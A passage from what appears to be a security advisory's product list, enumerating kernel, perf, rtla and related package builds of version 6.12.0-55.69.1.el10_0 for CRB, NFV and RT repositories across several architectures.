"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
